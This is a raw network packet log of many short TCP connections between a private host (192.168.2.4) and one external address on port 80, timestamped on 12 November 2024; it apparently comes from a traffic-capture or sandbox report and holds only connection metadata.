                                                                                                            Nov 12, 2024 00:42:35.362137079 CET4975680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:35.369451046 CET804975637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:35.369520903 CET4975680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:35.369682074 CET4975680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:35.376352072 CET804975637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:35.695749998 CET4975680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:35.702955008 CET4975780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:35.710262060 CET804975737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:35.710335016 CET4975780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:35.710448980 CET4975780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:35.717125893 CET804975737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:35.744431973 CET804975637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:35.788026094 CET804975637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:35.788084030 CET4975680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:35.865283012 CET4975880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:35.871879101 CET804975837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:35.871969938 CET4975880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:35.872054100 CET4975880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:35.879509926 CET804975837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:35.911186934 CET4975380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:36.056922913 CET4975780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:36.063935041 CET804975737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:36.066225052 CET804975737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:36.228596926 CET4975880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:36.235615969 CET804975837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:36.235627890 CET804975837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:36.235636950 CET804975837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:36.295454979 CET804975737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:36.353517056 CET4975780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:36.371891975 CET804975737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:36.454462051 CET4975780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:36.456948042 CET804975837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:36.539707899 CET804975837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:36.539810896 CET4975880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:36.723026037 CET4975780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:36.723120928 CET4975880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:36.729142904 CET4975980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:36.731812954 CET804975737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:36.731826067 CET804975837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:36.731869936 CET4975780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:36.731914997 CET4975880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:36.736044884 CET804975937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:36.738250017 CET4975980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:36.738367081 CET4975980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:36.745409012 CET804975937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:37.088108063 CET4975980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:37.092986107 CET804975937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:37.092998028 CET804975937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:37.093013048 CET804975937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:37.324107885 CET804975937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:37.399935961 CET804975937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:37.403287888 CET4975980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:37.633691072 CET4975980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:37.634068012 CET4976080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:37.640249968 CET804976037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:37.640316963 CET4976080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:37.640408993 CET4976080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:37.640549898 CET804975937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:37.640599012 CET4975980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:37.646955013 CET804976037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:37.994327068 CET4976080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:37.999164104 CET804976037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:37.999186039 CET804976037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:37.999197006 CET804976037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:38.225048065 CET804976037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:38.297266006 CET804976037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:38.297317028 CET4976080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:38.546799898 CET4976080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:38.548204899 CET4976180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:38.552001953 CET804976037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:38.552062988 CET4976080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:38.553056955 CET804976137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:38.553128004 CET4976180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:38.553230047 CET4976180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:38.557980061 CET804976137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:38.900804996 CET4976180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:38.905735970 CET804976137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:38.905744076 CET804976137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:38.905752897 CET804976137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:39.133013010 CET804976137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:39.211893082 CET804976137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:39.212021112 CET4976180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:39.418275118 CET4976180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:39.419384956 CET4976280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:39.424978971 CET804976137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:39.425730944 CET804976237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:39.426496029 CET4976180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:39.426619053 CET4976280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:39.426619053 CET4976280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:39.432950974 CET804976237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:39.776876926 CET4976280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:39.783176899 CET804976237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:39.783190966 CET804976237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:39.783202887 CET804976237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:40.012104034 CET804976237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:40.056691885 CET4976280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:40.087781906 CET804976237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:40.244190931 CET4976280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:40.583930969 CET4976280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:40.584655046 CET4976380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:40.590569019 CET804976237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:40.590615034 CET4976280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:40.590689898 CET804976337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:40.590749025 CET4976380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:40.590864897 CET4976380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:40.597367048 CET804976337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:40.947431087 CET4976380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:40.953886986 CET804976337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:40.953900099 CET804976337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:40.953908920 CET804976337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:41.175642014 CET804976337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:41.252226114 CET804976337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:41.255162954 CET4976380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:41.388845921 CET4976380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:41.389360905 CET4976480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:41.395646095 CET804976337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:41.395854950 CET804976437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:41.395909071 CET4976380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:41.395929098 CET4976480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:41.396047115 CET4976480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:41.402460098 CET804976437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:41.466521025 CET4976580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:41.466694117 CET4976480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:41.472981930 CET804976537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:41.473197937 CET4976580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:41.473341942 CET4976580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:41.479504108 CET804976537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:41.516536951 CET804976437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:41.804543018 CET804976437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:41.804788113 CET4976480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:41.822426081 CET4976580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:41.827248096 CET804976537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:41.827271938 CET804976537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:52.807996988 CET804977937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:52.808060884 CET4977980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:52.878885984 CET804978037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:52.951802969 CET804978037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:52.953218937 CET4978080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:53.071907043 CET4977980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:53.071980953 CET4978080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:53.072792053 CET4978180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:53.079111099 CET804978137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:53.079231977 CET4978180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:53.079268932 CET4978180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:53.085900068 CET804978137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:53.090246916 CET804977937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:53.090302944 CET4977980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:53.090316057 CET804978037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:53.090356112 CET4978080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:53.447873116 CET4978180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:53.455137014 CET804978137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:53.455159903 CET804978137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:53.455169916 CET804978137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:53.669228077 CET804978137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:53.744328022 CET4978180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:53.746057034 CET804978137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:53.853715897 CET4978180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:53.869811058 CET4978180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:53.870414972 CET4978280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:53.876861095 CET804978137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:53.876926899 CET4978180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:53.877541065 CET804978237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:53.877593994 CET4978280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:53.877695084 CET4978280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:53.885538101 CET804978237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:54.228776932 CET4978280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:54.235284090 CET804978237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:54.235296965 CET804978237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:54.235306025 CET804978237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:54.446647882 CET804978237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:54.525438070 CET804978237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:54.525496960 CET4978280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:54.649424076 CET4978280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:54.650085926 CET4978380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:54.656898975 CET804978337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:54.656922102 CET804978237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:54.657006025 CET4978380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:54.657030106 CET4978280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:54.657130957 CET4978380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:54.663800955 CET804978337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:55.010478020 CET4978380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:55.015300989 CET804978337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:55.015328884 CET804978337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:55.015361071 CET804978337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:55.257982016 CET804978337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:55.306839943 CET4978380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:55.330940962 CET804978337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:55.475260019 CET4978380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:55.476500988 CET4978480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:55.480756044 CET804978337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:55.481264114 CET4978380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:55.481349945 CET804978437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:55.481482983 CET4978480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:55.481601000 CET4978480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:55.486371040 CET804978437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:55.838279963 CET4978480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:55.846158981 CET804978437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:55.846173048 CET804978437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:55.846180916 CET804978437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:56.064641953 CET804978437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:56.147361994 CET804978437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:56.147433996 CET4978480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:56.439810038 CET4978480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:56.440939903 CET4978580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:56.444983959 CET804978437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:56.445034027 CET4978480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:56.445820093 CET804978537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:56.445874929 CET4978580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:56.445975065 CET4978580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:56.450695038 CET804978537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:56.791649103 CET4978580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:56.796499968 CET804978537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:56.796518087 CET804978537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:56.796521902 CET804978537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:57.181226015 CET804978537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:57.181324005 CET804978537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:57.181368113 CET804978537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:57.181408882 CET4978580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:57.315644979 CET4978580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:57.316009045 CET4978680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:57.320735931 CET804978537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:57.320785999 CET804978637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:57.320833921 CET4978580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:57.320858002 CET4978680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:57.320962906 CET4978680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:57.325737953 CET804978637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:57.666299105 CET4978680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:57.671216965 CET804978637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:57.671233892 CET804978637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:57.671252966 CET804978637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:57.823682070 CET4978780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:57.823914051 CET4978680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:57.828521967 CET804978737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:57.828578949 CET4978780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:57.828654051 CET4978780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:57.829329967 CET804978637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:57.829375982 CET4978680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:57.833458900 CET804978737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:57.960405111 CET4978880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:57.965181112 CET804978837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:57.965260029 CET4978880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:57.965363979 CET4978880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:57.970403910 CET804978837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:58.181957960 CET4978780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:58.187849045 CET804978737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:58.188297987 CET804978737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:58.322570086 CET4978880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:58.327497959 CET804978837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:58.327547073 CET804978837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:58.327562094 CET804978837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:58.408297062 CET804978737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:58.484771967 CET804978737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:58.484822989 CET4978780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:58.533256054 CET804978837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:58.603737116 CET4978880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:58.604937077 CET804978837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:58.806889057 CET4978880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:58.908437967 CET4978780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:58.908499956 CET4978880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:58.913975000 CET804978737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:58.914388895 CET804978837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:58.914467096 CET4978780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:58.914478064 CET4978880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:58.915966988 CET4978980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:58.920881987 CET804978937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:58.921268940 CET4978980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:58.921369076 CET4978980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:58.926410913 CET804978937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:59.275695086 CET4978980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:59.280635118 CET804978937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:59.280648947 CET804978937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:59.280659914 CET804978937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:59.508398056 CET804978937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:59.556862116 CET4978980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:59.580563068 CET804978937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:59.700320959 CET4978980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:59.701062918 CET4979080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:59.705703020 CET804978937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:59.705847025 CET804979037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:59.705909014 CET4978980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:59.705941916 CET4979080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:59.706056118 CET4979080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:59.710978985 CET804979037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:00.056962967 CET4979080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:00.061949968 CET804979037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:00.061964035 CET804979037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:00.061975002 CET804979037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:00.290896893 CET804979037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:00.353770018 CET4979080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:00.369771004 CET804979037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:00.491159916 CET4979080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:00.491662025 CET4979280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:10.838354111 CET4986080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:10.843198061 CET804986037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:10.843210936 CET804986037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:10.843219042 CET804986037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:11.064681053 CET804986037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:11.143039942 CET804986037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:11.143095016 CET4986080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:11.261843920 CET4986780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:11.266633034 CET804986737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:11.266701937 CET4986780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:11.266812086 CET4986780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:11.271742105 CET804986737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:11.619605064 CET4986780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:11.823823929 CET804986737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:11.824491978 CET804986737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:11.824575901 CET804986737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:11.832807064 CET804986737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:12.041395903 CET4986780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:12.056829929 CET804986737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:12.151135921 CET4986780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:12.469683886 CET4986780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:12.470370054 CET4987380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:12.477150917 CET804986737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:12.477205038 CET4986780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:12.477427959 CET804987337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:12.477489948 CET4987380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:12.477610111 CET4987380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:12.484993935 CET804987337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:12.823370934 CET4987380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:12.828326941 CET804987337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:12.828413010 CET804987337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:12.828464031 CET804987337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:13.063471079 CET804987337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:13.141510963 CET804987337.44.238.250192.168.2.4
